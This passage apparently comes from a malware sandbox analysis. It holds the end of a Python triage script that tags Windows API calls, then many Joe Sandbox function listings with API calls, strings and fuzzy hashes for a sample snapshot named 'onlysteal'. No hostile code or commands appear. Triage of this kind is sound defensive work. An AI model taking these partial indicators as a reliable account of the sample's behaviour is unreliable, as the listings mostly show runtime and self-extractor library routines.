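    "MoveFileW": "file move/rename",
    "GetTempPathW": "temp directory lookup",
    "WriteFile": "file write",
    "SysAllocString": "BSTR allocation (COM call setup)",
}


def triage(entry):
    """Return human-readable tags for one entry; deduplicated, listing order."""
    tags = [WATCH[n] for n in dict.fromkeys(entry.direct_apis()) if n in WATCH]
    if any("ROOT\\CIMV2" in a for c in entry.calls for a in c.args):
        tags.append("WMI namespace ROOT\\CIMV2 passed as argument")
    return tags


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.meta.get("String ID") or "<no string>", e.direct_apis(), triage(e), e.pivot_key()[0][:16])
```

To run it over a whole report, paste the text of the function listing into SAMPLE or read it from a file; the Opcode Fuzzy Hash returned by pivot_key is the value to search for in other Joe Sandbox reports when checking whether a stub or library routine recurs across samples.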
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: U$$p$$z$
                                      • API String ID: 176396367-1715067004
                                      • Opcode ID: 2c7a6d3e16d6deef2b0d796ffe953bfbb954cb823538dac37398b0bf466f831c
                                      • Instruction ID: efe9975b3290ab8ea358458d66abf94778570f0efc7853d586b57098585af0fe
                                      • Opcode Fuzzy Hash: 2c7a6d3e16d6deef2b0d796ffe953bfbb954cb823538dac37398b0bf466f831c
                                      • Instruction Fuzzy Hash: 6D41B471A1066A5BCB15DF688C4A9EF7BBCEF01311F01001AFD46E7245DE30AE698EA4
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00249EEE
                                      • GetWindowRect.USER32(?,00000000), ref: 00249F44
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00249FDB
                                      • SetWindowTextW.USER32(?,00000000), ref: 00249FE3
                                      • ShowWindow.USER32(00000000,00000005), ref: 00249FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: $$RarHtmlClassName
                                      • API String ID: 3937224194-3526849998
                                      • Opcode ID: 8b4b94e0d39d4c62274f5f91233011df6efc1b3a89646eccc75fb21945fe0c4e
                                      • Instruction ID: dac6c246937a72708683cdfa4d4d8f2353db60199d621bb0452f50a2515752fd
                                      • Opcode Fuzzy Hash: 8b4b94e0d39d4c62274f5f91233011df6efc1b3a89646eccc75fb21945fe0c4e
                                      • Instruction Fuzzy Hash: 5941B132018310EFCB259FA4EC4DB6B7BA8FF48711F00455AF8499A166CB34D968CF65
                                      APIs
                                      • __aulldiv.LIBCMT ref: 0024122E
                                        • Part of subcall function 0023B146: GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00241251
                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00241263
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00241274
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241284
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241294
                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002412CF
                                      • __aullrem.LIBCMT ref: 00241379
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 67302037dfb518f0763d51dec728adc7c159d6bf025e3c69cef1c874abf668e0
                                      • Instruction ID: 2e10aa41a2892f2c6494cf0391439e0b7854105f4dcc974d96d7af0d36ac74e6
                                      • Opcode Fuzzy Hash: 67302037dfb518f0763d51dec728adc7c159d6bf025e3c69cef1c874abf668e0
                                      • Instruction Fuzzy Hash: 514139B15083459FC714DF65C88496BBBF9FF88314F00892EF99AC2210E774E569CB61
                                      APIs
                                      • _swprintf.LIBCMT ref: 00232536
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 3053425827-2277559157
                                      • Opcode ID: b19f0a66dddb8fd62c1423f53b8c1da1c2175d6c6d1820150ee53c931f5884ac
                                      • Instruction ID: 6e77d0fb5849f0ea25d91a6b2721a52b2ea0e744abe97d1c4e5cb961e43b0e10
                                      • Opcode Fuzzy Hash: b19f0a66dddb8fd62c1423f53b8c1da1c2175d6c6d1820150ee53c931f5884ac
                                      • Instruction Fuzzy Hash: AEF129F0628341DBCB15EF248495BFE77995F90300F18096DED86AB283CB64996DCB62
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: </p>$</style>$<br>$<style>$>
                                      • API String ID: 176396367-3568243669
                                      • Opcode ID: f6a8a5967a80e32794a20b1f6f7c0b56c6c0108e2e5b70ea6809128795079d34
                                      • Instruction ID: 581881d36643eaae2154bd05d0e3be7733d94910576184c77db8f7c187d42150
                                      • Opcode Fuzzy Hash: f6a8a5967a80e32794a20b1f6f7c0b56c6c0108e2e5b70ea6809128795079d34
                                      • Instruction Fuzzy Hash: 0B51D566B60323D5DB38AE699811B7773E4DFA1790F69041BE9C18B1C0FAA58CF18261
                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0025FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0025F6CF
                                      • __fassign.LIBCMT ref: 0025F74A
                                      • __fassign.LIBCMT ref: 0025F765
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0025F78B
                                      • WriteFile.KERNEL32(?,00000000,00000000,0025FE02,00000000,?,?,?,?,?,?,?,?,?,0025FE02,00000000), ref: 0025F7AA
                                      • WriteFile.KERNEL32(?,00000000,00000001,0025FE02,00000000,?,?,?,?,?,?,?,?,?,0025FE02,00000000), ref: 0025F7E3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 35e4d47d4c45dff690397bc0a7ba1924754433425c08bec822e4f4063f930134
                                      • Instruction ID: 1a457c505b9a8373a8fa09c0da4ece6f6f4d95df4fe601d920c7a55931835955
                                      • Opcode Fuzzy Hash: 35e4d47d4c45dff690397bc0a7ba1924754433425c08bec822e4f4063f930134
                                      • Instruction Fuzzy Hash: D051E5B1D10209AFCB10CFA8DD49AEEFBF8EF09301F14416AE951E7251D770AA54CBA4
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 0024CE9D
                                        • Part of subcall function 0023B690: _wcslen.LIBCMT ref: 0023B696
                                      • _swprintf.LIBCMT ref: 0024CED1
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(?,00000066,0027946A), ref: 0024CEF1
                                      • _wcschr.LIBVCRUNTIME ref: 0024CF22
                                      • EndDialog.USER32(?,00000001), ref: 0024CFFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                      • String ID: %s%s%u
                                      • API String ID: 689974011-1360425832
                                      • Opcode ID: e97bec4d8a5853f4af06b16e374a0aa13514ffa5834eae9b74862cc64162de2e
                                      • Instruction ID: faa12cc043b7284716379ecf2bef50db9b11fea3c964758ff0cc75cda9548e7d
                                      • Opcode Fuzzy Hash: e97bec4d8a5853f4af06b16e374a0aa13514ffa5834eae9b74862cc64162de2e
                                      • Instruction Fuzzy Hash: 4D41C4B1920219AADF29DF54DC45EEE77BCEB05300F4080A6FA09E7051EF748AA4CF61
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00252937
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0025293F
                                      • _ValidateLocalCookies.LIBCMT ref: 002529C8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 002529F3
                                      • _ValidateLocalCookies.LIBCMT ref: 00252A48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 6b4690041784e502d99000912112d2d4665544e7bc22ab91e30729a4f3387cfe
                                      • Instruction ID: a5fea0e0af3feac69e1892c11c1383280fd5e866f23eb7f6e2e3a4f9f87afb3b
                                      • Opcode Fuzzy Hash: 6b4690041784e502d99000912112d2d4665544e7bc22ab91e30729a4f3387cfe
                                      • Instruction Fuzzy Hash: 8941D534A20219DFCF10DF68C884A9EBBB0EF46315F148055EC156B392C7719A6DCF94
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 176396367-3743748572
                                      • Opcode ID: 9ed6b4de9188063aef9bdd7e040aca5c5a59cf8f3f7f03d0033ec616d71e1a89
                                      • Instruction ID: 3aeabe4443bd9c155d2bedc6760e03c5e0cd01afaa1f9931187c430f375bcd34
                                      • Opcode Fuzzy Hash: 9ed6b4de9188063aef9bdd7e040aca5c5a59cf8f3f7f03d0033ec616d71e1a89
                                      • Instruction Fuzzy Hash: CE315E326743565AD638EF549C42B7773E4EB50720F50441EF882472C0FBA0ADF887A5
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0024AAD2
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0024AB01
                                      • ReleaseDC.USER32(00000000,?), ref: 0024AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID: -$$7$$$
                                      • API String ID: 1429681911-3445527946
                                      • Opcode ID: 92eb25f6f9603826ceee2ec42f0dd3002e3b9b2ebf2d158235daa17804cdb3ab
                                      • Instruction ID: 7597f854bff26c934282ac10cb961904bc7ec2e5fc3ee8965f2d9e5499966c24
                                      • Opcode Fuzzy Hash: 92eb25f6f9603826ceee2ec42f0dd3002e3b9b2ebf2d158235daa17804cdb3ab
                                      • Instruction Fuzzy Hash: AE21F872108314AFD3019FA5EC4CE6FBFE9FB89355F04092AFA4692220D7319A548B62
                                      APIs
                                        • Part of subcall function 0025C868: _free.LIBCMT ref: 0025C891
                                      • _free.LIBCMT ref: 0025C8F2
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 0025C8FD
                                      • _free.LIBCMT ref: 0025C908
                                      • _free.LIBCMT ref: 0025C95C
                                      • _free.LIBCMT ref: 0025C967
                                      • _free.LIBCMT ref: 0025C972
                                      • _free.LIBCMT ref: 0025C97D
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction ID: 95f8c1b774c07a2e022bec975c37b20263253d234c49ea749d8e8b89d59ea10e
                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                      • Instruction Fuzzy Hash: 341172715A1708AAE521B771CC0BFCB7BEC9F10B02F400C14BB9D66092EA74B56D8F54
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0024E669,0024E5CC,0024E86D), ref: 0024E605
                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0024E61B
                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0024E630
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: bc5f95f7e7e456522d9106642a3d885bbaa1e9d895bdd159b1e3541e8c616abd
                                      • Instruction ID: dc96f53ca3a311ba2159a5907e3f3c0d9d2377676d8bb673deaa305dd65d1220
                                      • Opcode Fuzzy Hash: bc5f95f7e7e456522d9106642a3d885bbaa1e9d895bdd159b1e3541e8c616abd
                                      • Instruction Fuzzy Hash: 87F0C271BB06639B2F268E757C8C56662CC7A25741B03453ADA02D3140EBA0CC745B91
                                      APIs
                                      • _free.LIBCMT ref: 0025891E
                                        • Part of subcall function 00258DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34), ref: 00258DE2
                                        • Part of subcall function 00258DCC: GetLastError.KERNEL32(00263A34,?,0025C896,00263A34,00000000,00263A34,00000000,?,0025C8BD,00263A34,00000007,00263A34,?,0025CCBA,00263A34,00263A34), ref: 00258DF4
                                      • _free.LIBCMT ref: 00258930
                                      • _free.LIBCMT ref: 00258943
                                      • _free.LIBCMT ref: 00258954
                                      • _free.LIBCMT ref: 00258965
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID: p&
                                      • API String ID: 776569668-4236815001
                                      • Opcode ID: fca05a4224b3536e9ef0a373553c222c40ddc17b9cf0bbc89642a64a3c8a3445
                                      • Instruction ID: 78392f73160451238767fda586125a6ac17645cd94e78043f309647598a1e1dd
                                      • Opcode Fuzzy Hash: fca05a4224b3536e9ef0a373553c222c40ddc17b9cf0bbc89642a64a3c8a3445
                                      • Instruction Fuzzy Hash: 2CF0DA75C22126EBCB466F24FC0A4153BF5FB247253010507FA15662B1DBB2496DDF8A
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002414C2
                                        • Part of subcall function 0023B146: GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002414E6
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00241500
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00241513
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241523
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00241533
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 531ee01226c3811602914b524bf6ea0346ec8606f42420ecd87059c11cc2a5bd
                                      • Instruction ID: 11a8f24a86f73f56e7ffe8b8f1da6ee7a2edff74c75493c1f8fa099501007d6f
                                      • Opcode Fuzzy Hash: 531ee01226c3811602914b524bf6ea0346ec8606f42420ecd87059c11cc2a5bd
                                      • Instruction Fuzzy Hash: F8311875118346ABC704DFA8D88499BB7F8BF98714F008A1EF999C3210E770D559CBA6
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00252AF1,002502FC,0024FA34), ref: 00252B08
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00252B16
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00252B2F
                                      • SetLastError.KERNEL32(00000000,00252AF1,002502FC,0024FA34), ref: 00252B81
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: ce47a7be81e982a7c737e2476036cf6fc05f57317f6bbd1be90bc35ac6585faf
                                      • Instruction ID: 26f13edc718495fff3f96415f8123283fc10e1d2a2d066b8a66f641bd7c0a6f8
                                      • Opcode Fuzzy Hash: ce47a7be81e982a7c737e2476036cf6fc05f57317f6bbd1be90bc35ac6585faf
                                      • Instruction Fuzzy Hash: BE012836139312ADAA162E747C49A2A2B64EF127BB7205339FD10510E0FFB15C2C550C
                                      APIs
                                      • GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                      • _free.LIBCMT ref: 0025981C
                                      • _free.LIBCMT ref: 00259844
                                      • SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 00259851
                                      • SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                      • _abort.LIBCMT ref: 00259863
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: a73ae4722963dccfb4cec923c6af2ffc1310fb5a10dac1e8320831524d5486c0
                                      • Instruction ID: 52ed0e5fa8441e59fef355c7217636374eec4910a0eb939251a24ab669ffde18
                                      • Opcode Fuzzy Hash: a73ae4722963dccfb4cec923c6af2ffc1310fb5a10dac1e8320831524d5486c0
                                      • Instruction Fuzzy Hash: DAF0A935175602B6CA1277347C0EA2B1AA58FD2763F254134FE14A6192EFB0CC6D495D
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0024DC47
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024DC61
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024DC72
                                      • TranslateMessage.USER32(?), ref: 0024DC7C
                                      • DispatchMessageW.USER32(?), ref: 0024DC86
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0024DC91
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 76ae1bfa3df462ba4b0535978a184d9772116696aebe3fc7eb09545d2e8e5fc6
                                      • Instruction ID: 2d538f6321c3dda59ad2813eb29342a26f3ef0965b299db19d8e31b64fe1a136
                                      • Opcode Fuzzy Hash: 76ae1bfa3df462ba4b0535978a184d9772116696aebe3fc7eb09545d2e8e5fc6
                                      • Instruction Fuzzy Hash: 66F0FF72A01219BBCB20AFA5ED4DDDF7F7DEF42791B004012F50AD2061D675D65AC7A0
                                      APIs
                                        • Part of subcall function 0024A699: GetDC.USER32(00000000), ref: 0024A69D
                                        • Part of subcall function 0024A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0024A6A8
                                        • Part of subcall function 0024A699: ReleaseDC.USER32(00000000,00000000), ref: 0024A6B3
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0024A83C
                                        • Part of subcall function 0024AAC9: GetDC.USER32(00000000), ref: 0024AAD2
                                        • Part of subcall function 0024AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0024AB01
                                        • Part of subcall function 0024AAC9: ReleaseDC.USER32(00000000,?), ref: 0024AB99
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: "$$($A$
                                      • API String ID: 1061551593-3683093551
                                      • Opcode ID: 452a4b6cef098294368606d60593222db992714918d47b0778c4ccccc352774b
                                      • Instruction ID: 2bb109d6210d8c03235c90c4e64dcf2a3a4c3b37f49585ba2872e954c8111b3f
                                      • Opcode Fuzzy Hash: 452a4b6cef098294368606d60593222db992714918d47b0778c4ccccc352774b
                                      • Instruction Fuzzy Hash: 2A91FF71218355AFD724DF25D858A2BBBF8FF89700F00491EF99AD3220DB70A945CB62
                                      APIs
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 0023B92D: _wcsrchr.LIBVCRUNTIME ref: 0023B944
                                      • _wcslen.LIBCMT ref: 0023C197
                                      • _wcslen.LIBCMT ref: 0023C1DF
                                      Similarity
                                      • API ID: _wcslen$_wcsrchr
                                      • String ID: .exe$.rar$.sfx
                                      • API String ID: 3513545583-31770016
                                      • Opcode ID: cf7bcaa42889285238322c665515b3a43448008705d4a64e2c88d92c489b1c6f
                                      • Instruction ID: 4cd7839b5166f1a5e8f13ae154792494051419b68fb7fa881ba5928182d7b665
                                      • Opcode Fuzzy Hash: cf7bcaa42889285238322c665515b3a43448008705d4a64e2c88d92c489b1c6f
                                      • Instruction Fuzzy Hash: 104135A653035295C73AAF748842A3BB3A8EF41744F30090EF9D67B081EB605DF1D795
                                      APIs
                                      • _wcslen.LIBCMT ref: 0023BB27
                                      • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0023A275,?,?,00000800,?,0023A23A,?,0023755C), ref: 0023BBC5
                                      • _wcslen.LIBCMT ref: 0023BC3B
                                      Similarity
                                      • API ID: _wcslen$CurrentDirectory
                                      • String ID: UNC$\\?\
                                      • API String ID: 3341907918-253988292
                                      • Opcode ID: 459320c15e09f424490edf9f541043b8a550f7e6413adc1ffd36d4098eb5cb88
                                      • Instruction ID: 0135eba0a70fe1334bf1dce84074eb46a39149137f91b06da5a388ae2ad1b547
                                      • Opcode Fuzzy Hash: 459320c15e09f424490edf9f541043b8a550f7e6413adc1ffd36d4098eb5cb88
                                      • Instruction Fuzzy Hash: 0D4164B1460216AACF32AF60CC41EEA77A9AF45394F108866FA55A3151DB709AB08E50
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 0024CD84
                                        • Part of subcall function 0024AF98: _wcschr.LIBVCRUNTIME ref: 0024B033
